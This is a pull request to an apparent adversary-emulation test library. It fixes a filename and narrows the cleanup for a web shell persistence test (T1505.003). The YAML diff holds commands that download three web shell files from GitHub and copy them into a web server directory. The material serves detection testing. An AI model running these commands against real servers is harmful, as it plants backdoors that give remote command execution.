### PR TITLE
safer cleanup, correct filename

### DIFF
--- a/atomics/T1505.003/T1505.003.yaml
+++ b/atomics/T1505.003/T1505.003.yaml
@@ -27,12 +27,14 @@ atomic_tests:
     get_prereq_command: |
       New-Item -Type Directory (split-path #{web_shells}) -ErrorAction ignore | Out-Null
       Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/b.jsp" -OutFile "#{web_shells}/b.jsp"
-      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/test.jsp"
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/tests.jsp" -OutFile "#{web_shells}/tests.jsp"
       Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1505.003/src/cmd.aspx" -OutFile "#{web_shells}/cmd.aspx"
   executor:
     command: |
-      xcopy #{web_shells} #{web_shell_path}
+      xcopy /I /Y #{web_shells} #{web_shell_path}
     cleanup_command: |
-      del #{web_shell_path} /q >nul 2>&1
+      del #{web_shell_path}\b.jsp /q >nul 2>&1
+      del #{web_shell_path}\tests.jsp /q >nul 2>&1
+      del #{web_shell_path}\cmd.aspx /q >nul 2>&1
     name: command_prompt
 


### PR DESCRIPTION
Cleanup now just deletes the 3 webshell files instead of the whole web directory. Fixed mispelled file name. Add xcopy arguments so users not prompted about destination location.